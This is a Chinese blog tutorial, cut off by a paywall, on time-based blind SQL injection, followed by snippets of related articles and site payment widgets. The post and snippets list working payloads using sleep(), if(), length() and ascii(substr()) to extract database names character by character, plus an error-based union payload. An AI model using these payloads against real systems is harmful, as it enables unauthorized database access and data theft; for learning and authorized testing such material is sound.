SQL盲注(延时注入)

最新推荐文章于 2025-03-20 23:21:07 发布
原创 最新推荐文章于 2025-03-20 23:21:07 发布 · 1.2w 阅读 · 32 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#SQL注入

本文详细介绍了SQL盲注的过程,包括判断注入类型、猜解数据库名、表名、字段名及数据。通过二分法和特定函数如sleep()、ascii()、substr()等,逐步揭示数据库信息。最终,成功获取了用户名admin和其密码的MD5值,展示了完整的SQL盲注攻击流程。

思路:
*判断是否存在注入,注入是字符型还是数字型
*猜解当前数据库名
*猜解数据库表名
*猜解字段名
*猜解数据
1判断注入类型

payload result
1’ and sleep(5) # 延迟
1 and sleep(5)# 没有延迟

存在字符型注入
2猜解当前数据库名
2.1猜解数据库名的长度:

payload result
1’ and if(length(database())=1,sleep(5),1) # 没有延迟
1’ and if(length(database())=2,sleep(5),1) # 没有延迟
1’ and if(length(database())=3,sleep(5),1) # 没有延迟
1’ and if(length(database())=4,sleep(5),1) # 延迟

说明数据库名长度为4个字符。
2.2采用二分法猜解数据库名:

payload result
1’ and if(ascii(substr(database(),1,1))>97,sleep(5),1) # 延迟
1’ and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 没有延迟
1’ and if(ascii(substr(database(),1,1))>100,sleep(5),1) # 没有延迟

说明数据库的第一个字符为小写字母d(ASCII码:100)
重复上述步骤,就能猜解出数据库名。
3猜解数据库的表名
3

最低0.47元/天 解锁文章
SQL注入延时注入
m0_56578216的博客
08-23 1213
延时注入就是利用sleep()函数通过if语句判断所写的语句真假,如果为真返回我们想要的东西(例如:数据库的长度,数据库的名字等)如果我们写的东西不符合则会利用sleep()函数让服务器休眠。固定的理解sleep(x) 函数的意义是关键,就是个自行设定如果判断成功那么就会延迟x秒延时注入的关键是sleep函数和if语句,通过sleep函数判断语句的真假,。
SQL注入渗透与攻防(八)之延时注入
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-23 975
关于延时注入的使用场景一般在我们测试的注入点没有报错信息又没有回显点的情况下进行的。达到延时数据显示,从而通过数据显示的时间判断数据对错!
SQL注入-06】延时注入案例
m0_64378913的博客
04-26 2964
1 概述 当改变浏览器传给后台SQL的参数后, 浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入;同时,输入参数为真或假也无法从页面显示上查出差异,无法使用布尔注入 ,这时候可以试试看能否使用延时注入延时:也称延时注入、时间注入等,这种注入方式在传给后台的参数中,设置了一个if语句,当条件为真时执行sleep语句,条件为假时无执行语句,然后根据浏览器的响应时间来推测sleep语句是否被执行,进而推测if条件是否为真。 延时与布尔的核心思想都是通过浏览器两种
SQL注入漏洞-05】延时注入靶场实战
cc
02-04 6616
布尔延时注入的相同点:都是通过浏览器页面两种不同的响应来推测输入条件的真假性布尔延时注入的不同点:布尔是在条件真假时页面会有不同的显示延时注入则是只能在响应时间上推测显示结果的真假延时注入的缺点:有时候网页响应慢并不是因为sleep语句起的效果,也可能是网络等外部因素的影响。同时时间成本很高。
sql注入延时注入
weixin_45653478的博客
04-09 3119
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
4.3SQL注入延时注入
qq_64177395的博客
09-04 1266
mid(a,b,c): 从b开始,截取a字符串的c位。substr(a,b,c): 从b开始,截取字符串a的c长度。参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度。if(a,b,c):可以理解在java程序中的三目运算符,a条件成立 执行b, 条件不成立,执行c。1.防止引号 ‘ “ 转义。
SQL 注入之报错注入延时注入、布尔
2301_77160226的博客
08-27 1786
SQL 注入攻击中,报错注入延时注入和布尔是常见的攻击手段。这些攻击方式利用了数据库系统在处理用户输入时的漏洞,从而获取敏感信息或者执行恶意操作。本文将详细介绍这三种 SQL 注入攻击方式的原理和实现方法。
小迪安全笔记 第四十四天 sql && 实战利用sql 进行漏洞的利用
2301_81155391的博客
12-04 1430
主要学了不同的方法 bool 用于数据的回显 延迟因为它本身意作用就是判断用的 所以数据回显和报错代码的存在对他没影响黑盒测试:如果是黑盒我们需要可以找注入点直接工具 也可以分析第二种就是 根据数据的回显和报错进行分别测试 从而选择 不同的注入方法bool型(需要数据的回显)报错型 (需要 error函数的出现)延迟型 最全能的可能搭配 bool进行爆破火狐渗透蓝奏云优享版kk源码蓝奏云优享版。
【DVWA靶场】Web安全之(布尔值/延时)SQL(超详细教程)
weixin_60838266的博客
07-25 1862
SQL注入是一种常见的网络安全漏洞,通过利用网站对用户输入数据的不完善检查和过滤,攻击者可以向数据库服务器发送恶意的SQL查询,从而获取敏感信息或者对数据库进行破坏。在本文中,通过Kali Linux对DVWA的SQL Injection模块展开了实验,并使用手工和burpsuite工具针对Low、Medium和High等级进行了布尔值/延时型的SQL测试
SQL注入延时python自动化利用
最新发布
lubiii_的博客
03-20 1200
掌握延时自动化需分步实践,从基础请求到优化绕过,最终实现稳定高效的数据提取工具。重点理解每个模块的底层逻辑,而非直接复制代码。
DVWA靶场-SQL Injection (Blind)SQL注入
mlws1900的博客
03-19 1874
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
13、SQL延时注入
songling515010475的专栏
05-22 787
1.如下图测试SQL注入,参数乱填确不起作业,但这不代表不存在注入。 2.因为分Boolean型注入,与时间型注入,这里是时间型注入。 3.利用if 和 sleep进入注入,这里的if相当于java里面的三目运算一样,第一位是条件,第二位是第一位成立则执行第二位,否则执行第三位,这里我判断库名长度,如果库名长度为12则休息10秒再返回结果 4.判断库名第一位是否是Ascii位数中的107 ,107 代码字母k,因为我这里之前做提目己经知道是K了,所以直接尝试107,达到了我要的..
SQL注入5之时间延迟注入
weixin_56218159的博客
05-28 656
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献 ...
SQL注入--延时注入
weixin_52351575的博客
10-13 927
的时候是没有任何延迟的,所以判定它的首字母的ascii码值是107.找出ascii码表对应的首字母是f。原理:在没有得到任何回显的情况下,只能通过延迟页面的跳转来进行数据库的核对。我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化。接着,我们利用ascii()的函数去找出数据库的第一个字母的ascii码值。的时候,界面没有任何延迟,于是判定数据库的长度是12个字节长。所以判定我们输入的sql代码得到了执行。于是,我们输入代码,来查询数据库的长度。改90的值,依次递增,最终得到代码。
SQL注入手册-时间延迟注入
jdk12123的博客
09-01 2564
时间注入又名延时注入,属于注入的一种,通常是某个注入点无法通过布尔型注入获取数据而采用一种突破注入的技巧。在 mysql 里 函数 sleep()延时的意思,sleep(10)就是 数据库延时 10 秒返回内容。判断注入可以使用’and sleep(10) 数据库延时 10 秒返回值 网页响应时间至少要 10 秒 根据这个原理来判断存在 SQL 时间注入。mysql 延时注入用到的函数 sleep() 、if()、substring()
sql注入-延时注入】sleep()、benchmark()函数 延时注入
热门推荐
07-10 1万+
延时注入】结合if、case when 延时注入
mysql 延时注入,利用二进制延迟注入~!
weixin_33701617的博客
08-31 493
看了freebuf的延迟注入课程,感觉他那个突破延迟注入时间限制的思路非常不错 视频地址:然后自己写了个py的demo,代码写的渣勿笑~#!/usr/bin/envpython #-*-coding:utf-8-*- #@Author:Lcy #@Date:2015-08-2922:26:17 #@LastModifiedby:Sunsh...
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 5311
1.概念 1.延时注入:当进行的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
评论 6
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值